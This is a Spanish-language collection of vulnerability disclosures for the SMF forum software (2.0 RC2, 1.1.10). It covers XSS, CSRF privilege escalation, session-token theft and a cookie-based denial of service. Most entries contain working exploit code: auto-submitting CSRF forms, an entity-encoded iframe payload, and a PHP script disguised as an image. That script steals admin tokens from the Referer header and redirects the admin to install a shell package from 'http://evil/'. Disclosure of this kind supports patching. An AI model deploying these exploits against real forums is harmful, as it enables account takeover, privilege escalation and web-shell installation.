Detalles

Descripción:	XSS en el administrador de paquetes
Descubierto por:	cicatriz.r00t@gmail.com
Código vulnerable:	Sources/Packages.php:1384
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

---

Descripción

Este ataque de Cross-Site Scripting sucede cuando especificamos como FTP
Server ("pack_server" input) algo como:

"/onmouseover="alert(0);

Este problema reside en la linea 1384 del archivo Sources/Packages.php
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Packages.php#1384

Aunque tambien se puede ver en otras variables:

+++Packages.php @@ 1381:1388
  1381		if (isset($_POST['submit']))
  1382		{
  1383			updateSettings(array(
  1384				'package_server' => $_POST['pack_server'],
  1385				'package_port' => $_POST['pack_port'],
  1386				'package_username' => $_POST['pack_user'],
  1387				'package_make_backups' => !empty($_POST['package_make_backups'])
  1388			));
---Packages.php

Esto se puede hacer automáticamente mediante CSRF, que aunque tiene un token el
formulario original no es checkeado.

Entonces el código seria simple:

<body onload="document.forms[0].elements[4].click();">
	<form accept-charset="UTF-8" method="post"
action="/index.php?action=admin;area=packages;sa=options">
		<input type="text" size="30"
value="&#38;#34;&#38;#62;&#38;#60;&#38;#105;&#38;#102;&#38;#114;&#38;#97;&#38;#109;&#38;#101;&#38;#47;&#38;#115;&#38;#114;&#38;#99;&#38;#61;&#38;#34;&#38;#106;&#38;#97;&#38;#118;&#38;#97;&#38;#115;&#38;#99;&#38;#114;&#38;#105;&#38;#112;&#38;#116;&#38;#58;&#38;#97;&#38;#108;&#38;#101;&#38;#114;&#38;#116;&#38;#40;&#38;#48;&#38;#41;&#38;#34;&#38;#62;"
id="pack_server" name="pack_server"/>
		<input type="text" value="" size="3" id="pack_port" name="pack_port"/>
		<input type="text" size="30" value="" id="pack_user" name="pack_user"/>
		<input type="checkbox" checked="checked" class="check" value="1"
id="package_make_backups" name="package_make_backups"/>
		<input type="submit" value="Save" name="submit"/>
	</form>
</body>

Solo con que se cumpla el if() se alojan las variables:

El ataque XSS también se ejecuta en la sección de "File Permissions".

Detalles

Descripción:	CSRF permite darle permisos a los usuarios normales para modificar permisos del foro
Descubierto por:	ysk.sft@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

---

Descripción

Este CSRF permitiria solo haciendo que el administrador visite una web de
nosotros con su sesion de su foro abierta hacer que le de permisos a los
usuarios normales para cambiar los permisos de los grupos como por ejemplo
los moderadores globales .

El error fue probado en SMF 2.0 RC2

Ejemplo de un HTML que cambiaria los permisos:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
<script>
    $(document).ready(function(){
      $("#id_formulario").submit();
    });
</script>
<form id="id_formulario" action="http://localhost/foro2/index.php?action=admin;area=permissions;save;sa=settings" method = "POST" target = "asdf" >
<input name="manage_permissions[0]" value="on" />
<input name="manage_permissions[2]" value="off" />
<input name="manage_permissions[4]" value="off" />
<input name="manage_permissions[5]" value="off" />
<input name="manage_permissions[6]" value="off" />
<input name="manage_permissions[7]" value="off" />
<input name="manage_permissions[8]" value="off" />
<input name="permission_enable_deny" value="1" />
<input name="permission_enable_postgroups" value="1" />
</form>
<iframe name="asdf" id="asdf" src="/ruta/archivo.html"></iframe>
 

Detalles

Descripción:	CSRF permite elevar privilegios de usuarios normales para modificar los smileys
Descubierto por:	ysk.sft@gmail.com
Código vulnerable:	N/A
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 2.0 RC2

---

Descripción

El CSRF se encuentra en /index.php?action=admin;area=smileys;save;sa=settings
y permite hacer que los usuarios normales tengan poderes para modificar los
smileys.

Aparte de modificar los smileys tambien se puede aprovechar para ver la
ruta de los archivos algo como un path discloure en
/index.php?action=admin;area=smileys;sa=settings.

<form id="id_formulario"
action="http://localhost/foro2/index.php?action=admin;area=smileys;save;sa=settings
method = "POST" target = "asdf" style="visibility:hidden;">
<input name="manage_smileys[0]" value="on" />
</form>
 

Detalles

Descripción:	Robo del token de sesión
Descubierto por:	WHK@elhacker.net
Código vulnerable:	Sources/Post.php:815 y Themes/classic/Display.template.php:407
URL Vulnerable:	N/A
PoC:	N/A
Afecta a:	‭‬SMF 1.1.10 y 2.0 RC2

---

Descripción

Esta vulnerabilidad permite el robo de tu hash que evita cualquier tipo de
ataque CSRF, esto significa que si logras obtener dicho hash podrás
realizar cualquier tipo de acción arbitraria.

Para demostrar este bug hacemos un post cualquiera en nuestro foro de
pruebas, luego vamos a ese post y le hacemos click en el botón "quote" o
"citar", en ese momento comenzarás a crear una respuesta al post con una
citación y si te das cuenta has incluido en la url tu token de seguridad y
mas abajo se incluyen los post anteriores INCLUYENDO código bbc interpretado.
Esto quiere decir que puedes realizar un post con una imagen enlazada a tu
servidor web, entonces cuando alguien haga una cita de un post que se
encuentre en la misma página de post tuyo se incluirá la visualización de
dicha imagen y quedará grabado tu token en mis logs de acceso.

Puedes crear un script automatizado que actue de imagen y si captura de
referencia algún token entonces será capturado y enviará una redireción
hacia un ataque de tipo CSRF incluyendo tu token bypaseando el sistema de
seguridad de smf.

El problema está en todos los themes de smf xD incluyendo el theme clásico
ya que lleva el token de forma nativa en el enlace l igual que todos los
themes.
Themes/classic/Display.template.php linea 407

También es en parte problema de la función que procesa el citado de post ya
que te exige por obligación dicho token y no debería pedirse
Sources/Post.php linea 815
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/Post.php#815

También hay que recordar las vulnerabilidades encontradas en el cual
necesitas el token del usuario.

PoC:

<?php
 
/* Evitamos un error inesperado */
error_reporting(0);
 
/* Imagen a visualizar */
$imagen_carnada = 'http://t2.gstatic.com/images?q=tbn:MBl2gp1VvxRl2M:http://rufadas.com/wp-content/uploads/2007/04/cara-de-culo.jpg';
$servidor_shell = 'http://evil/';
$mod_shell = 'shell_mod.zip';
 
$referer = $_SERVER['HTTP_REFERER'];
$referer = explode(';', $referer);
/* Token formado por un hash de 32 carácteres
mas un nombre de variable al azar */
foreach($referer as $token){
 $token = explode('=', $token);
 if(strlen($token[0]) > 6){
  if(strlen($token[1]) == 32){
   $url_foro = $_SERVER['HTTP_REFERER'];
   $url_foro = explode('index.php', $url_foro);
   $url_foro = $url_foro[0];
   /* Apostamos a un CSRF apuntando al panel de administración */
   header(
    'location: '.$url_foro.'index.php?action=admin;'.
    'area=packages;get;sa=download;byurl;package='.
    urlencode($servidor_shell).';filename='.urlencode($mod_shell).';'.
    $token[0].'='.$token[1]);
   exit;
  }
 }
}
 
/* No hay token */
header('Content-Type: image/jpeg');
echo file_get_contents($imagen_carnada);
exit;
?>

Nota de YST:

Detalles

Descripción:	DoS en el acceso al foro
Descubierto por:	sirdarckcat@elhacker.net
Código vulnerable:	Sources/QueryString.php;108 , Sources/QueryString.php:126 y Sources/QueryString.php:112
URL Vulnerable:	index.php?http:// o index.php?1=1
PoC:	Cookie: GLOBALS
Afecta a:	‭‬SMF 2.0 RC2

---

Descripción

Por la siguiente linea:

        if (isset($_REQUEST['GLOBALS']) || isset($_COOKIE['GLOBALS']))
                die('Invalid request variable.');

http://code.google.com/p/smf2-review/source/browse/trunk/Sources/QueryString.php#108

Si podemos poner una cookie llamada GLOBALS el usuario no podra entrar al
foro.. no es explotable per-se porque necesitamos una manera de poner dicha
cookie.. y si podemos poner cookies es mas facil denegar el acceso con
cookies largas, pero bueno..

Lo mismo va para parametros con numeros:
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/QueryString.php#112

        foreach (array_merge(array_keys($_POST), array_keys($_GET),
array_keys($_FILES)) as $key)
                if (is_numeric($key))
                        die('Numeric request keys are invalid.');

Eso es para evitar problemas de un bug que habia en unset()..
no es tan peligroso ya pero pues..

http://tu-foro-smf/index.php?http://
wtf?
http://code.google.com/p/smf2-review/source/browse/trunk/Sources/QueryString.php#126

si necesitan una Url que diga:

ahi la tienen, puede servir para forzar un error aveces..